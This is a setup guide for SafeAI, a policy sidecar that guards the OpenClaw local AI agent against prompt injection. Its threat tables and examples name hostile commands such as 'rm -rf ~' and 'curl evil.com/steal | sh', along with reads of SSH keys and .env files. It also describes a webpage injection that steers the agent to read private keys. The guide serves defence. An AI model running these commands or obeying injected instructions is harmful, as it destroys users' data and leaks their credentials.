Securing OpenClaw with SafeAI¶
OpenClaw is an open-source personal AI assistant that runs locally on your machine. It connects to WhatsApp, Telegram, Slack, Discord, Signal, iMessage, and more — executing real actions like browsing the web, running shell commands, reading and writing files, sending emails via Gmail, and managing GitHub repos.
That power is exactly why it needs SafeAI. An autonomous agent with shell access, file system permissions, and messaging capabilities is one prompt injection away from leaking credentials, sending PII to the wrong chat, or running rm -rf on your home directory.
This guide shows how to secure OpenClaw in 4 commands using SafeAI's intelligence layer — no manual policy writing required.
Why OpenClaw needs guardrails¶
OpenClaw's agent can:
| Capability | Risk |
|---|---|
Execute shell commands (bash) | rm -rf ~, curl ... \| sh, credential exfil |
| Read/write files | Access .env, ~/.ssh/id_rsa, ~/.aws/credentials |
| Browse the web (Playwright/CDP) | Navigate to phishing pages, leak session cookies |
| Send messages (WhatsApp, Telegram, Slack, etc.) | Forward PII or secrets to unintended recipients |
| Gmail Pub/Sub integration | Read/send email with your real inbox |
| GitHub integration | Push code, create repos, expose tokens |
| Cron jobs and webhooks | Persistent backdoor tasks |
A single prompt injection — via an incoming DM, a webpage the agent visits, or a file it reads — could exploit any of these. SafeAI sits between OpenClaw and these tools to enforce policy at every boundary.
Architecture¶
OpenClaw is a Node.js/TypeScript application. SafeAI is Python. The integration uses SafeAI's REST proxy running as a sidecar — OpenClaw calls SafeAI's HTTP API before and after tool execution.
┌─────────────────┐
User (WhatsApp, │ │ ┌──────────────┐
Telegram, Slack, ───> │ OpenClaw │ ─────> │ AI Provider │
Discord, etc.) │ Gateway │ <───── │ (Claude, │
│ ws://127.0.0.1 │ │ OpenAI) │
│ :18789 │ └──────────────┘
│ │
│ Tool calls ────┼──────> ┌──────────────┐
│ (bash, file, │ │ SafeAI │
│ browser, │ <───── │ Sidecar │
│ messaging) │ │ :8484 │
└─────────────────┘ └──────────────┘
│
Policy Engine
Audit Logger
Secret Scanner
PII Detector
Intelligence Layer
Step 1 — Install and initialize¶
# Install OpenClaw
npm install -g openclaw@latest
openclaw onboard --install-daemon
# Install SafeAI
uv pip install safeai
# Initialize SafeAI in your workspace
cd ~/openclaw-workspace
safeai init
safeai init scaffolds config files and walks you through an interactive setup:
SafeAI initialized
created: safeai.yaml
created: policies/default.yaml
created: contracts/example.yaml
...
Intelligence Layer Setup
SafeAI can use an AI backend to auto-generate policies,
explain incidents, and recommend improvements.
Enable the intelligence layer? [Y/n]: Y
Choose your AI backend:
1. Ollama (local, free — no API key needed)
2. OpenAI
3. Anthropic
4. Google Gemini
5. Mistral
6. Groq
7. Azure OpenAI
8. Cohere
9. Together AI
10. Fireworks AI
11. DeepSeek
12. Other (any OpenAI-compatible endpoint)
Select provider [1]: 1
Intelligence layer configured!
provider: ollama
model: llama3.2
Next steps:
safeai intelligence auto-config --path . --apply
safeai serve --mode sidecar --port 8000
That's it — no YAML editing needed. The interactive setup writes the intelligence configuration to safeai.yaml for you.
Tip
The AI backend is only used for advisory tasks (generating configs, explaining incidents). It is never in the enforcement loop. SafeAI enforces policies deterministically — no LLM involved at runtime.
Step 2 — Auto-generate policies¶
Let SafeAI's intelligence layer analyze your workspace and generate policies, contracts, and agent identities — all tailored to OpenClaw:
Review what was generated:
Apply when you're satisfied:
The generated policies cover secrets, PII, dangerous commands, sensitive file paths, outbound messaging approvals, and more — all inferred from your project structure.
Step 3 — Generate the OpenClaw integration code¶
Let the intelligence layer generate the skill code that wires SafeAI into OpenClaw's tool pipeline:
This produces ready-to-use OpenClaw skill files:
ls .safeai-generated/
# skills/safeai-guard/index.js — API client (scanInput, guardOutput, interceptTool)
# skills/safeai-guard/hooks.js — Pre/post hooks with tag inference
Copy them into your OpenClaw workspace:
The generated skill handles:
- Input scanning — every inbound message is checked before the model sees it
- Tool interception — every tool call (bash, file, browser, messaging) is validated against policies
- Output guarding — every model response is scanned for secrets and PII before reaching the user
- Tag inference — automatically tags tool calls as destructive, external, sensitive, etc.
Step 4 — Start both services¶
# Terminal 1: SafeAI sidecar
safeai serve --mode sidecar --port 8484
# Terminal 2: OpenClaw
openclaw start
That's it. SafeAI is now enforcing policies on every boundary.
See it in action¶
Dangerous shell command blocked¶
A user (or prompt injection) asks the agent to run a destructive command:
SafeAI intercepts and blocks:
Credential exfiltration blocked¶
A prompt injection hidden in a webpage tells the agent to read your SSH key:
{
"tool_name": "file_read",
"parameters": { "path": "~/.ssh/id_ed25519" }
}
// → Blocked: "Access to credential files and private keys is denied."
API key in inbound message blocked¶
Someone sends a message containing a secret:
{
"text": "Hey, use this key: sk-proj-abc123def456 for the API"
}
// → Blocked: "Credentials, API keys, and tokens must never cross any boundary."
PII redacted in model response¶
The model generates a response containing a phone number:
{
"text": "I found your contact: John at 555-867-5309 and john@example.com"
}
// → Redacted: "I found your contact: John at [REDACTED] and [REDACTED]"
Outbound message requires approval¶
The agent tries to send a WhatsApp message:
{
"tool_name": "send_message",
"parameters": { "channel": "whatsapp", "to": "+1-555-123-4567" }
}
// → Held: "Outbound messages require user approval."
Approve from the CLI:
Ongoing: AI-powered monitoring¶
Explain security incidents¶
When SafeAI blocks something, use the intelligence layer to understand what happened:
# Find blocked events
safeai logs --action block --last 1h
# Ask the AI to explain
safeai intelligence explain evt_a1b2c3d4
Classification: CREDENTIAL_EXFILTRATION
Severity: CRITICAL
The agent attempted to read ~/.ssh/id_ed25519 via the file_read tool.
This matches a known prompt injection pattern. The "block-sensitive-files"
policy correctly prevented the read.
Suggested remediation:
- Review the conversation history for hidden instructions
- Consider adding the source channel to a watch list
Get policy recommendations¶
After running for a while, let the AI analyze your audit data and suggest improvements:
Gap Analysis:
- 12 "require_approval" events for send_message but 0 for gmail_send.
Both are external messaging tools — consider the same approval policy.
- No policy covers the "browser" tool's screenshot response field.
Screenshots could contain PII rendered on screen.
Generated file: .safeai-generated/policies/recommended.yaml
Review and apply:
cat .safeai-generated/policies/recommended.yaml
safeai intelligence recommend --since 7d --output-dir .safeai-generated --apply
Generate compliance policies¶
If your OpenClaw deployment handles regulated data:
safeai intelligence compliance --framework hipaa --output-dir .safeai-generated
safeai intelligence compliance --framework gdpr --output-dir .safeai-generated
safeai intelligence compliance --framework soc2 --output-dir .safeai-generated
Metrics and observability¶
safeai_requests_total{boundary="input",action="block"} 23
safeai_requests_total{boundary="input",action="allow"} 1847
safeai_requests_total{boundary="action",action="block"} 8
safeai_requests_total{boundary="action",action="require_approval"} 12
safeai_requests_total{boundary="output",action="redact"} 156
safeai_requests_total{boundary="output",action="allow"} 2034
What SafeAI prevents¶
| Threat | Without SafeAI | With SafeAI |
|---|---|---|
rm -rf ~/ via prompt injection | Files deleted | Blocked |
Agent reads ~/.ssh/id_rsa | Private key exposed | Blocked |
| API key in inbound message | Key forwarded to LLM | Blocked |
| Model hallucinates phone number | PII shown to user | Redacted |
| Agent sends WhatsApp autonomously | Message sent without consent | Held for approval |
git push to public repo | Code pushed without review | Held for approval |
curl evil.com/steal \| sh | Arbitrary code execution | Blocked |
| Webhook contains leaked API key | Key reaches model context | Blocked |
Agent reads .env | Env vars exposed | Blocked |
Running as a system service¶
For always-on operation, run SafeAI alongside OpenClaw's daemon.
cat > ~/.config/systemd/user/safeai.service << 'EOF'
[Unit]
Description=SafeAI Sidecar for OpenClaw
After=network.target
[Service]
ExecStart=safeai serve --mode sidecar --port 8484
WorkingDirectory=%h/openclaw-workspace
Restart=always
[Install]
WantedBy=default.target
EOF
systemctl --user enable --now safeai
cat > ~/Library/LaunchAgents/com.safeai.sidecar.plist << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.safeai.sidecar</string>
<key>ProgramArguments</key>
<array>
<string>safeai</string>
<string>serve</string>
<string>--mode</string>
<string>sidecar</string>
<string>--port</string>
<string>8484</string>
</array>
<key>WorkingDirectory</key>
<string>/Users/you/openclaw-workspace</string>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
EOF
launchctl load ~/Library/LaunchAgents/com.safeai.sidecar.plist
Summary¶
Securing OpenClaw with SafeAI takes 4 commands:
safeai init # interactive setup
safeai intelligence auto-config --path . --apply # generate policies
safeai intelligence integrate --target openclaw --path . --apply # generate skill
safeai serve --mode sidecar --port 8484 # enforce
No YAML editing. No manual policy writing. The interactive CLI configures your AI backend, the intelligence layer generates everything else — you just review and apply.
Next steps¶
- Intelligence Layer — full guide to AI advisory agents
- Proxy / Sidecar Guide — REST API reference
- Policy Engine — customize generated policies
- Approval Workflows — human-in-the-loop gates
- Audit Logging — query the decision trail
- OpenClaw Documentation — OpenClaw setup and skills